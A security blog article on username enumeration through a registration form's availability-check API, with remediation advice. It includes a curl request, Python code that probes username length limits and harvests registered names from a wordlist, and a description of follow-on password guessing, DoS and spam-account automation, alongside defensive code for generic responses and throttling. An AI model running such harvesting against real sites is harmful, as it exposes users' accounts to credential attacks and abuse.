Harvesting Usernames from Websites

I am working with a client right now on their Web application. While creating an account to do testing, I noticed a glaring security issue that allows people to harvest usernames. This topic has been covered before, and I am still surprised that it keeps popping up around the Web, but this time is a bit different. I should note that the client knows about the issue; what I want to point out in this article is how insidious it becomes.

Let's say that this client has designed their registration form similar to the following image.

From a UX standpoint, including these form elements makes sense:

  1. It allows the guest to choose their own username.
  2. It informs the guest that their username is private and will never be shown publicly.
  3. It allows the guest to verify that their username is available, and suggests alternative usernames should theirs be taken.

The issue here is that a user's username is not private, since the "Check Availability" functionality tells the guest whether a name has already been taken. Thus, by exhaustively trying candidate names, we can discover which usernames are registered on the system (this is called harvesting).

How Exploitable is This?

Note: I have modified all request/payload/response data for privacy and security.

Since no page refresh happens when the "Check Availability" button is clicked, an AJAX call must be happening behind the scenes. Yay! That means the endpoint will be easier to call directly (we don't need to worry about setting up nonces and other harnesses in our test).

$ curl -d "name=jeremy" https://www.example.org/api/reserve-name
{"valid": true, "suggestions": ["jeremy790896", "jeremy543343", "jeremy148799"], "inuse": true}
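For scripting, the same request can be made with Python's standard library. This is a minimal sketch: `build_request` and `check_name` are hypothetical helper names, and the URL is the placeholder from the curl call above. Like `curl -d`, it sends a form-encoded POST body.

```python
import json
import urllib.parse
import urllib.request

# Placeholder endpoint copied from the curl example above.
API_URL = "https://www.example.org/api/reserve-name"


def build_request(name: str) -> urllib.request.Request:
    """Build the same form-encoded POST that `curl -d "name=..."` sends."""
    body = urllib.parse.urlencode({"name": name}).encode("ascii")
    return urllib.request.Request(
        API_URL,
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )


def check_name(name: str) -> dict:
    """Send the request and decode the JSON reply (hypothetical helper)."""
    with urllib.request.urlopen(build_request(name), timeout=10) as resp:
        return json.loads(resp.read().decode("utf-8"))
```

Separating request construction from sending makes it easy to inspect or replay a call without touching the network.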

Stop the presses, what is this? The response from the API call is very detailed and, as potential attackers, we thank them for it. Dissecting this response:

  • valid: true tells us the username passes validation. This is useful, because we can now submit names of various lengths to find the true minimum and maximum username lengths, which narrows down our permutation space.
  • suggestions: [...] lists other usernames available for reservation. Since these usernames haven't been taken, we can remove them from the permutation space as well. Our space is getting much smaller now.
  • inuse: true tells us that this username is taken by another user and is therefore a target worth attacking. Because valid and inuse are reported separately, it also tells us that a username which fails validation could still come back as in use. This may point us to accounts, such as those of administrators (or other VIPs), that were given usernames guests cannot register through the public interface.
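That dissection can be written as a small function over the sample response shown earlier. This is a sketch: `interpret` and its output keys are hypothetical, and they only restate what each field leaks according to the list above.

```python
import json

# The sample reply from the curl call above.
SAMPLE = ('{"valid": true, "suggestions": ["jeremy790896", "jeremy543343", '
          '"jeremy148799"], "inuse": true}')


def interpret(name: str, payload: str) -> dict:
    """Summarise what one reserve-name reply reveals about the system."""
    data = json.loads(payload)
    valid = bool(data.get("valid"))
    inuse = bool(data.get("inuse"))
    return {
        # Passed server-side validation: feeds the length search.
        "valid": valid,
        # A registered account, i.e. a candidate target.
        "taken": name if inuse else None,
        # Suggested names are unregistered, so they can be pruned.
        "known_free": list(data.get("suggestions", [])),
        # In use yet failing validation: possibly a privileged account.
        "suspicious": inuse and not valid,
    }
```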

One other important piece of the puzzle: making multiple API calls never tripped the security scanners. I was able to call this API repeatedly, at any speed, from the same IP address and was never rejected.

The Payload

First we need to find out what a valid username looks like. We start with a 1-character username and keep adding letters until the valid key returns true; that length is our true minimum length [1]. Then we keep adding letters until valid returns false; the last length that still returned true is our true maximum length.
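The length search can be sketched as follows, assuming a hypothetical `is_valid` wrapper around the API that returns the `valid` flag. Repeating a single probe character is also an assumption: a validator that rejects strings like "aaaa" for reasons other than length would skew the result. The `limit` cap stops the loop if no upper bound turns up.

```python
from typing import Callable, Optional, Tuple


def find_length_bounds(
    is_valid: Callable[[str], bool], probe_char: str = "a", limit: int = 256
) -> Optional[Tuple[int, int]]:
    """Grow a probe one character at a time and report (min_len, max_len).

    Returns None if no length up to `limit` validates; if every length from
    the minimum up to `limit` validates, `limit` is reported as the maximum.
    """
    min_len = None
    for length in range(1, limit + 1):
        ok = is_valid(probe_char * length)
        if min_len is None:
            if ok:
                min_len = length  # first length the server accepts
        elif not ok:
            return (min_len, length - 1)  # last length that was accepted
    return None if min_len is None else (min_len, limit)
```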

Now that the attack vectors have been identified, we can script a payload that hits the server and harvests its usernames. All we need is a list of common first names: read it into memory and call the API for each item. As the API responds, we store the result for that name and, if it was taken, the suggested names in our database. At a minimum, we only need to query names whose length falls within the valid range we found previously. Once this process is complete, there should be enough harvested names to begin attacking the login page by submitting common passwords (that part is outside the scope of this article).
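A sketch of that loop is below. `harvest` is a hypothetical name, `check_name` is any callable that returns the decoded JSON reply (a stub works for testing), and two in-memory sets stand in for the database. Names outside the length bounds found earlier, or already classified, are skipped so no request is wasted.

```python
from typing import Callable, Dict, Iterable, Set, Tuple


def harvest(
    names: Iterable[str],
    check_name: Callable[[str], Dict],
    bounds: Tuple[int, int],
) -> Tuple[Set[str], Set[str]]:
    """Walk a wordlist against the availability API.

    Returns (taken, free): registered usernames, and names known to be unused.
    """
    lo, hi = bounds
    taken: Set[str] = set()
    free: Set[str] = set()
    for raw in names:
        name = raw.strip()
        # Skip names outside the valid length range or already classified.
        if not lo <= len(name) <= hi or name in taken or name in free:
            continue
        reply = check_name(name)
        if reply.get("inuse"):
            taken.add(name)
        else:
            free.add(name)
        # Suggestions are unregistered names, which shrinks the search space.
        free.update(reply.get("suggestions", []))
    return taken, free
```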

Preventing Attacks

Short of removing the ability for users to check the availability of a username (which would hurt UX), there are a few things that can be done to reduce the number of attack vectors.

First, the response from the API call should be a simple yes or no. That tells an attacker very little, because a "no" could mean either that the name failed validation or that it was already taken.
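On the server side, this can be as small as collapsing both checks into one boolean. In the sketch below, the validation rule (3 to 16 lowercase letters, digits or underscores), the `available` key and the `availability_response` name are all hypothetical; the real rules are whatever the application enforces.

```python
import json
import re
from typing import AbstractSet

# Hypothetical validation rule, for illustration only.
USERNAME_RE = re.compile(r"[a-z0-9_]{3,16}")


def availability_response(name: str, existing: AbstractSet[str]) -> str:
    """Return a single boolean that hides *why* a name is unavailable."""
    available = USERNAME_RE.fullmatch(name) is not None and name not in existing
    return json.dumps({"available": available})
```

A failed validation and a taken name produce the same reply, so the response no longer distinguishes the two cases.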

Do not suggest new usernames. In my experience, people rarely take these suggestions anyway, and the algorithms are simply terrible: most of them just append a random number to the name you asked for.

Always throttle API requests based on IP address and/or the User-Agent string. The server should never accept an endless stream of requests from the same IP address, nor should it accept a flurry of them without flagging the client as a possible attacker [2]. The best approach is to progressively slow down responses as more requests come in.
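One way to "slow down each request the more that come in" is a sliding-window counter that returns a growing delay instead of a hard block, which is gentler on the shared-IP case in footnote 2. This is a sketch: `ProgressiveThrottle` is a hypothetical class, the window, allowance and step values are illustrative, and the key can be an IP, an IP plus User-Agent, or anything else. The caller is expected to wait for the returned delay before responding.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict


class ProgressiveThrottle:
    """Sliding-window counter that adds delay as a client sends more requests."""

    def __init__(self, window: float = 60.0, free: int = 10, step: float = 0.5,
                 max_delay: float = 30.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.window = window        # seconds of history to remember
        self.free = free            # requests allowed per window without delay
        self.step = step            # extra seconds per request over the allowance
        self.max_delay = max_delay  # cap so legitimate users are not stalled forever
        self.clock = clock
        self.hits: Dict[str, Deque[float]] = defaultdict(deque)

    def delay_for(self, key: str) -> float:
        """Record a request from `key` and return how long to stall it."""
        now = self.clock()
        hits = self.hits[key]
        # Drop timestamps that have aged out of the window.
        while hits and now - hits[0] > self.window:
            hits.popleft()
        hits.append(now)
        excess = len(hits) - self.free
        return 0.0 if excess <= 0 else min(self.max_delay, excess * self.step)
```

Every request is recorded, including delayed ones, so a client that keeps hammering the endpoint keeps its delay high until it backs off for a full window.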

There's Always More to Attack…

Relating to the last point about the lack of request throttling, another thing this security flaw tells us is that we can effectively DoS the server at every level. The server must check a data store somewhere to see whether the submitted username has been taken. That's 1 database call. The system then generates 3 suggested usernames, which it must also check against the database. That's another 1 to 3 calls (depending on optimization). Caching would not be advisable here because we want to know, in real time, whether a username is taken, so each request goes straight to the database. Thus a simple script that hammers the API endpoint will hit the database 2 to 4 times per request, potentially allowing us to lock up both the web server and the database.
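To make the 2-to-4 count concrete, the sketch below uses an in-memory SQLite table (a stand-in, since the client's actual data store is unknown) and counts round trips for two hypothetical strategies: checking each suggestion individually versus batching all suggestions into one `IN (...)` query.

```python
import sqlite3
from typing import List, Sequence, Tuple


class CountingDB:
    """Thin wrapper that counts round trips to the database."""

    def __init__(self, conn: sqlite3.Connection) -> None:
        self.conn = conn
        self.queries = 0

    def fetch(self, sql: str, params: Sequence = ()) -> list:
        self.queries += 1
        return self.conn.execute(sql, params).fetchall()


def make_db() -> CountingDB:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY)")
    conn.executemany("INSERT INTO users VALUES (?)", [("jeremy",), ("jeremy1",)])
    conn.commit()
    return CountingDB(conn)


def check_naive(db: CountingDB, name: str,
                suggestions: List[str]) -> Tuple[bool, List[str]]:
    """One query for the name plus one per suggestion (1 + 3 = 4)."""
    taken = bool(db.fetch("SELECT 1 FROM users WHERE username = ?", (name,)))
    free = [s for s in suggestions
            if not db.fetch("SELECT 1 FROM users WHERE username = ?", (s,))]
    return taken, free


def check_batched(db: CountingDB, name: str,
                  suggestions: List[str]) -> Tuple[bool, List[str]]:
    """One query for the name plus one IN (...) query (1 + 1 = 2)."""
    taken = bool(db.fetch("SELECT 1 FROM users WHERE username = ?", (name,)))
    if not suggestions:
        return taken, []
    marks = ",".join("?" * len(suggestions))
    rows = db.fetch(f"SELECT username FROM users WHERE username IN ({marks})",
                    suggestions)
    used = {row[0] for row in rows}
    return taken, [s for s in suggestions if s not in used]
```

Even the batched version costs two queries per request, so without throttling, request volume translates directly into database load.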

Taking this exploit further, it opens up another attack vector: the creation of spam accounts. Anyone can write an automated website registration script, but the ability to check whether a username is available lets the script create accounts with a near-100% success rate. If the script can also check an email account for the activation code and then follow the link, registration can be fully automated. For another client, I wrote a script demonstrating exactly this, as they were certain it couldn't be done (they have since started using prevention techniques like CAPTCHAs).

Footnotes

  1. I use the word "true" here because although a minimum and maximum length can be supplied in the HTML or JavaScript, those are both client-side and cannot be trusted to be the correct validation parameters. Only the server will report the true values of these parameters. 

  2. Care should be taken here not to immediately assume an IP address belongs to an attacker. Many networks sit behind NAT, meaning multiple distinct computers can all appear to the API server as one IP address. When, for example, students in a classroom all register at the same time, it could look like a DoS attack on the server when it isn't.